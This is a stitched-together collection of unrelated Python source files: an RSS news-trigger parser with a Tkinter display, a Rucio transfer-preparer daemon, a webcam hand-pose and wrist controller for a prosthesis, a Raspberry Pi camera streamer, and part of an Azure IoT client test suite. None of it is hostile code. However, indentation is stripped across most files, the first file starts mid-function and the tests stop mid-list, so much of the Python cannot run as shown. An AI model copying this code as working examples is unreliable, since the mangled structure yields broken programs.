    def create_trigger(trig_type, arg1, arg2=None):
        """
        Assumes:
            trig_type: str which is either TITLE, DESCRIPTION, AFTER, BEFORE, NOT, AND, OR
        Returns:
            corresponding trigger object
        """
        if trig_type == 'TITLE':
            return TitleTrigger(arg1)
        elif trig_type == 'DESCRIPTION':
            return DescriptionTrigger(arg1)
        elif trig_type == 'AFTER':
            return AfterTrigger(arg1)
        elif trig_type == 'BEFORE':
            return BeforeTrigger(arg1)
        elif trig_type == 'NOT':
            return NotTrigger(arg1)
        elif trig_type == 'AND':
            return AndTrigger(arg1, arg2)
        elif trig_type == 'OR':
            return OrTrigger(arg1, arg2)
trigger_file = open(filename, 'r')
lines = []
triggers_dict = {}
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line.split(','))
for line in lines:
if line[0] != 'ADD':
            if line[1] not in ('NOT', 'AND', 'OR'):
                triggers_dict[line[0]] = create_trigger(line[1], line[2])
            elif line[1] == 'NOT':
                # NOT wraps a single previously defined trigger
                triggers_dict[line[0]] = create_trigger(line[1], triggers_dict[line[2]])
            else:
                triggers_dict[line[0]] = create_trigger(line[1], triggers_dict[line[2]], triggers_dict[line[3]])
relevant_triggers = []
for trigger in lines[-1][1:]:
if trigger in triggers_dict.keys():
relevant_triggers.append(triggers_dict[trigger])
return relevant_triggers
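# A hypothetical triggers.txt illustrating the format read_trigger_config expects
# (inferred from the parsing above; '//' lines are comments and the final ADD line
# names the triggers to activate):
#   t1,TITLE,election
#   t2,DESCRIPTION,vaccine
#   t3,AND,t1,t2
#   ADD,t1,t3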
SLEEPTIME = 120 #seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
# t1 = TitleTrigger("election")
# t2 = DescriptionTrigger("Trump")
# t3 = DescriptionTrigger("Biden")
# t4 = AndTrigger(t2, t3)
# triggerlist = [t1, t4]
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
# read_trigger_config('triggers.txt')
triggerlist = read_trigger_config('triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT,fill=Y)
t = "Google & Yahoo Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
# Get stories from Google's Top Stories RSS news feed
stories = process("http://news.google.com/news?output=rss")
# Get stories from Yahoo's Top Stories RSS news feed
stories.extend(process("http://news.yahoo.com/rss/topstories"))
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
preparer.py
|
# -*- coding: utf-8 -*-
# Copyright 2020-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
import functools
import logging
import threading
from time import time
from typing import TYPE_CHECKING
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import RucioException
from rucio.common.logging import setup_logging
from rucio.core.request import preparer_update_requests, reduce_requests, sort_requests_minimum_distance, \
get_transfertool_filter, get_supported_transfertools, rse_lookup_filter, list_transfer_requests_and_source_replicas
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
if TYPE_CHECKING:
from typing import Optional
from sqlalchemy.orm import Session
from rucio.daemons.conveyor.common import HeartbeatHandler
graceful_stop = threading.Event()
def stop():
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, bulk=100):
"""
Running the preparer daemon either once or by default in a loop until stop is called.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
def preparer_kwargs():
        # build a fresh kwargs dict for each thread so the workers never share mutable state
return {'once': once, 'sleep_time': sleep_time, 'bulk': bulk}
threads = [threading.Thread(target=preparer, name=f'conveyor-preparer-{i}', kwargs=preparer_kwargs(), daemon=True) for i in range(threads)]
for thr in threads:
thr.start()
all_running = True
while all_running:
for thr in threads:
thr.join(timeout=3.14)
if not thr.is_alive() or graceful_stop.is_set():
all_running = False
break
if graceful_stop.is_set() or once:
logging.info('conveyor-preparer: gracefully stopping')
else:
logging.warning('conveyor-preparer: stopping out of the ordinary')
graceful_stop.set()
for thr in threads:
thr.join(timeout=3.14)
logging.info('conveyor-preparer: stopped')
def preparer(once, sleep_time, bulk, partition_wait_time=10):
    # Make an initial heartbeat so that all instantiated daemons have the correct worker number on the next try
logger_prefix = executable = 'conveyor-preparer'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=functools.partial(
run_once,
bulk=bulk
),
activities=None,
)
def run_once(bulk: int = 100, heartbeat_handler: "Optional[HeartbeatHandler]" = None, session: "Optional[Session]" = None, **kwargs) -> bool:
if heartbeat_handler:
worker_number, total_workers, logger = heartbeat_handler.live()
else:
# This is used in tests
worker_number, total_workers, logger = 0, 0, logging.log
start_time = time()
try:
req_sources = list_transfer_requests_and_source_replicas(
total_workers=total_workers,
worker_number=worker_number,
limit=bulk,
request_state=RequestState.PREPARING,
session=session
)
if not req_sources:
count = 0
updated_msg = 'had nothing to do'
else:
transfertool_filter = get_transfertool_filter(lambda rse_id: get_supported_transfertools(rse_id=rse_id, session=session))
requests = reduce_requests(req_sources, [rse_lookup_filter, sort_requests_minimum_distance, transfertool_filter], logger=logger)
count = preparer_update_requests(requests, session=session)
updated_msg = f'updated {count}/{bulk} requests'
except RucioException:
logger(logging.ERROR, 'errored with a RucioException, retrying later', exc_info=True)
count = 0
updated_msg = 'errored'
logger(logging.INFO, '%s, taking %.3f seconds' % (updated_msg, time() - start_time))
queue_empty = False
if count < bulk:
queue_empty = True
return queue_empty
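if __name__ == "__main__":
    # Hypothetical local entry point (a sketch only; in a real deployment the
    # daemon is normally started through its own bin script): run a single
    # preparer pass and let SIGTERM trigger the graceful stop event above.
    import signal
    signal.signal(signal.SIGTERM, lambda signum, frame: stop())
    run(once=True, threads=1, sleep_time=10, bulk=100)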
|
starpi_control_app.py
|
import cv2
import numpy as np
import math
import serial
from socket import *
import time
import threading
import sys
# Address and port of the server that receives all of the data
# (the default port is 3001)
socketInfo = ["localhost", 3001]
# Estimates the number of open and closed fingers of the hand seen by the camera
# so the pose can be mimicked on the robotic prosthesis
def handPoseEstimation(socketInfo):
    # Open the UDP connection to the server
socketCliente = socket(AF_INET, SOCK_DGRAM)
accionmano=""
lastestmano=0
    # Start the video capture
cap = cv2.VideoCapture(0)
    # Loop that captures and processes every frame delivered by the camera
while(cap.isOpened()):
        # Read the frame and store it in two variables
ret, img = cap.read()
        # Draw the region of interest where the hand pose data will be extracted
cv2.rectangle(img,(350,350),(90,90),(0,255,0),0)
crop_img = img[90:350, 90:350]
        # Apply grayscale conversion and blur filters
grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
value = (35, 35)
blurred = cv2.GaussianBlur(grey, value, 0)
        # Create a thresholded (high-contrast) view
_, thresh1 = cv2.threshold(blurred, 127, 255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
cv2.imshow('Thresholded', thresh1)
        # Find the contours
contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
max_area = -1
        # Keep the contour with the largest area
for i in range(len(contours)):
cnt=contours[i]
area = cv2.contourArea(cnt)
if(area>max_area):
max_area=area
ci=i
cnt=contours[ci]
        # Draw a bounding rectangle around the area containing the contour
x,y,w,h = cv2.boundingRect(cnt)
cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0)
        # Build a convex hull by joining the points of the detected contour
hull = cv2.convexHull(cnt)
drawing = np.zeros(crop_img.shape,np.uint8)
cv2.drawContours(drawing,[cnt],0,(0,255,0),0)
cv2.drawContours(drawing,[hull],0,(0,0,255),0)
hull = cv2.convexHull(cnt,returnPoints = False)
defects = cv2.convexityDefects(cnt,hull)
count_defects = 0
cv2.drawContours(thresh1, contours, -1, (0,255,0), 3)
        # Trace lines between the convexity-defect points
for i in range(defects.shape[0]):
s,e,f,d = defects[i,0]
start = tuple(cnt[s][0])
end = tuple(cnt[e][0])
far = tuple(cnt[f][0])
a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)
b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)
c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)
angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57
            # angle at the defect via the law of cosines (the factor 57 ~ 180/pi converts radians to degrees);
            # angles of 90 degrees or less count as a detected finger gap
if angle <= 90:
count_defects += 1
cv2.circle(crop_img,far,1,[0,0,255],-1)
cv2.line(crop_img,start,end,[0,255,0],2)
        # Choose an action symbol according to the number of fingers found
if count_defects == 1:
accionmano="@"
elif count_defects == 2:
accionmano="#"
elif count_defects == 3:
accionmano="$"
elif count_defects == 4:
accionmano="%"
else:
accionmano="!"
        # Send the number of open fingers to replicate on the prosthesis; a new value is sent only when the finger count changes
if lastestmano!=accionmano:
socketCliente.sendto(accionmano.encode(), (socketInfo[0], socketInfo[1]))
lastestmano=accionmano
#print(accionmano)
time.sleep(0.2)
        # Show the processed images
cv2.imshow('Gesture', img)
all_img = np.hstack((drawing, crop_img))
cv2.imshow('Contours', all_img)
        # Stop the application when the ESC key is pressed
k = cv2.waitKey(10)
if k == 27:
cv2.destroyAllWindows()
cap.release()
socketCliente.close()
break
# Receives the wrist accelerometer data used to control the wrist of the prosthesis
def wristControl(socketInfo):
    # Open the UDP connection to the server
socketCliente = socket(AF_INET, SOCK_DGRAM)
    # Configure the serial connection that receives the accelerometer data sent by the microcontroller
#ser = serial.Serial('COM13', 38400) # Windows
ser = serial.Serial('/dev/ttyUSB0', 38400) # Linux Ubuntu
    # Control loop
while True:
        # Read the serial command up to the terminator character "|" and forward it over the socket to the control server
try:
comando = ser.read_until(b'|')
socketCliente.sendto(comando, (socketInfo[0], socketInfo[1]))
        # Stop the application with a keyboard interrupt (Ctrl+C)
except KeyboardInterrupt:
socketCliente.close()
ser.close()
print ("Interrupted")
sys.exit(0)
# Create two threads to run both functions in parallel so neither slows down the reading and processing of data
t1 = threading.Thread(target = handPoseEstimation,args=(socketInfo,))
t2 = threading.Thread(target = wristControl,args=(socketInfo,))
# Start both threads
t1.start()
t2.start()
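# Minimal sketch of the receiving side (hypothetical; the actual control server is a
# separate program): it listens on the same UDP port and decodes the one-character hand
# symbols sent above, where '!' means no convexity defects and '@'..'%' encode 1..4.
#
#   from socket import socket, AF_INET, SOCK_DGRAM
#   DEFECT_SYMBOLS = {"@": 1, "#": 2, "$": 3, "%": 4}
#   server = socket(AF_INET, SOCK_DGRAM)
#   server.bind(("localhost", 3001))
#   while True:
#       data, _ = server.recvfrom(1024)
#       message = data.decode(errors="ignore")
#       if message in DEFECT_SYMBOLS:
#           print("convexity defects detected:", DEFECT_SYMBOLS[message])
#       elif message == "!":
#           print("hand closed / no defects")
#       else:
#           print("wrist accelerometer frame:", message)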
|
camerastreamer.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import socket
import struct
import time
import numpy as np
from multiprocessing import Process
from threading import Thread
import cv2
from src.utils.templates.workerprocess import WorkerProcess
class CameraStreamer(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""Process used for sending images over the network. UDP protocol is used. The
image is compressed before it is send.
Used for visualizing your raspicam from PC.
Parameters
----------
inPs : list(Pipe)
List of input pipes, only the first pipe is used to transfer the captured frames.
outPs : list(Pipe)
List of output pipes (not used at the moment)
"""
super(CameraStreamer,self).__init__( inPs, outPs)
self.serverIp = '192.168.1.102' # PC ip
        self.port = 2244          # stream receiver TCP port
# ===================================== RUN ==========================================
def run(self):
"""Apply the initializing methods and start the threads.
"""
self._init_socket()
super(CameraStreamer,self).run()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the sending thread.
"""
if self._blocker.is_set():
return
streamTh = Thread(name='StreamSending',target = self._send_thread, args= (self.inPs[0], ))
streamTh.daemon = True
self.threads.append(streamTh)
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket.
"""
self.client_socket = socket.socket()
self.connection = None
        # Try repeatedly to connect to the camera receiver.
try:
while self.connection is None and not self._blocker.is_set():
try:
self.client_socket.connect((self.serverIp, self.port))
self.client_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.connection = self.client_socket.makefile('wb')
except ConnectionRefusedError as error:
time.sleep(0.5)
pass
except KeyboardInterrupt:
self._blocker.set()
pass
# ===================================== SEND THREAD ==================================
def _send_thread(self, inP):
"""Sending the frames received thought the input pipe to remote client by using a socket.
Parameters
----------
inP : Pipe
Input pipe to read the frames from other process.
"""
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]
print('Start streaming')
while True:
try:
stamps, image = inP.recv()
result, image = cv2.imencode('.jpg', image, encode_param)
data = image.tobytes()
size = len(data)
self.connection.write(struct.pack("<L",size))
self.connection.write(data)
except Exception as e:
print("CameraStreamer failed to stream images:",e,"\n")
# Reinitialize the socket for reconnecting to client.
self.connection = None
self._init_socket()
pass
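# ===================================== RECEIVER SKETCH ===============================
# Hypothetical PC-side counterpart (not part of the original BFMC code): shows how the
# length-prefixed JPEG stream written by _send_thread above can be read back and shown.
def _debug_receive_stream(bind_ip='0.0.0.0', port=2244):
    """Accept a single streamer connection and display the received frames."""
    server = socket.socket()
    server.bind((bind_ip, port))
    server.listen(1)
    conn, _ = server.accept()
    stream = conn.makefile('rb')
    try:
        while True:
            # read the 4-byte little-endian size prefix, then the JPEG payload
            header = stream.read(struct.calcsize("<L"))
            if len(header) < struct.calcsize("<L"):
                break
            size = struct.unpack("<L", header)[0]
            data = stream.read(size)
            frame = cv2.imdecode(np.frombuffer(data, dtype=np.uint8), cv2.IMREAD_COLOR)
            cv2.imshow('RemoteCamera', frame)
            if cv2.waitKey(1) == 27:  # stop the preview on ESC
                break
    finally:
        cv2.destroyAllWindows()
        stream.close()
        conn.close()
        server.close()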
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipeline, constant, config
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.auth import IoTEdgeError
logging.basicConfig(level=logging.DEBUG)
# automatically mock the iothub pipeline for all tests in this file.
@pytest.fixture(autouse=True)
def mock_pipeline_init(mocker):
return mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
# automatically mock the http pipeline for all tests in this file.
@pytest.fixture(autouse=True)
def mock_pipeline_http_init(mocker):
return mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
################
# SHARED TESTS #
################
class SharedClientInstantiationTests(object):
@pytest.mark.it(
"Stores the IoTHubPipeline from the 'iothub_pipeline' parameter in the '_iothub_pipeline' attribute"
)
def test_iothub_pipeline_attribute(self, client_class, iothub_pipeline, http_pipeline):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline is iothub_pipeline
@pytest.mark.it(
"Stores the HTTPPipeline from the 'http_pipeline' parameter in the '_http_pipeline' attribute"
)
def test_sets_http_pipeline_attribute(self, client_class, iothub_pipeline, http_pipeline):
client = client_class(iothub_pipeline, http_pipeline)
assert client._http_pipeline is http_pipeline
@pytest.mark.it("Sets on_connected handler in the IoTHubPipeline")
def test_sets_on_connected_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_connected is not None
assert client._iothub_pipeline.on_connected == client._on_connected
@pytest.mark.it("Sets on_disconnected handler in the IoTHubPipeline")
def test_sets_on_disconnected_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_disconnected is not None
assert client._iothub_pipeline.on_disconnected == client._on_disconnected
@pytest.mark.it("Sets on_method_request_received handler in the IoTHubPipeline")
    def test_sets_on_method_request_received_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_method_request_received is not None
assert (
client._iothub_pipeline.on_method_request_received
== client._inbox_manager.route_method_request
)
class ConfigurationSharedClientCreateFromConnectionStringTests(object):
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self, mocker, mock_pipeline_init, client_class, connection_string
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
args = (connection_string,)
client_class.create_from_connection_string(*args)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, mock_pipeline_init, client_class, connection_string, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
args = (connection_string,)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_connection_string(*args, **kwargs)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, connection_string
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
args = (connection_string,)
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_connection_string(*args, **kwargs)
class SharedClientCreateFromConnectionStringTests(object):
@pytest.mark.it(
"Uses the connection string and CA certificate combination to create a SymmetricKeyAuthenticationProvider"
)
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_auth_provider_creation(self, mocker, client_class, connection_string, ca_cert):
mock_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert mock_auth_parse.call_count == 1
assert mock_auth_parse.call_args == mocker.call(connection_string)
assert mock_auth_parse.return_value.ca_cert is ca_cert
@pytest.mark.it("Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_pipeline_creation(
self, mocker, client_class, connection_string, ca_cert, mock_pipeline_init
):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse.return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_client_instantiation(self, mocker, client_class, connection_string, ca_cert):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_returns_client(self, client_class, connection_string, ca_cert):
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client = client_class.create_from_connection_string(*args, **kwargs)
assert isinstance(client, client_class)
# TODO: If auth package was refactored to use ConnectionString class, tests from that
# class would increase the coverage here.
@pytest.mark.it("Raises ValueError when given an invalid connection string")
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(object(), id="Non-string input"),
pytest.param(
"HostName=Invalid;DeviceId=Invalid;SharedAccessKey=Invalid",
id="Malformed Connection String",
marks=pytest.mark.xfail(reason="Bug in pipeline + need for auth refactor"), # TODO
),
],
)
def test_raises_value_error_on_bad_connection_string(self, client_class, bad_cs):
with pytest.raises(ValueError):
client_class.create_from_connection_string(bad_cs)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, iothub_pipeline):
client.connect()
assert iothub_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'disconnect' pipeline operation")
def test_calls_pipeline_disconnect(self, client, iothub_pipeline):
client.disconnect()
assert iothub_pipeline.disconnect.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'disconnect' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.disconnect
)
client_manual_cb.disconnect()
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectEventTests(object):
@pytest.mark.it("Clears all pending MethodRequests upon disconnect")
def test_state_change_handler_clears_method_request_inboxes_on_disconnect(self, client, mocker):
clear_method_request_spy = mocker.spy(client._inbox_manager, "clear_all_method_requests")
client._on_disconnected()
assert clear_method_request_spy.call_count == 1
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' IoTHubPipeline operation")
def test_calls_pipeline_send_message(self, client, iothub_pipeline, message):
client.send_message(message)
assert iothub_pipeline.send_message.call_count == 1
assert iothub_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
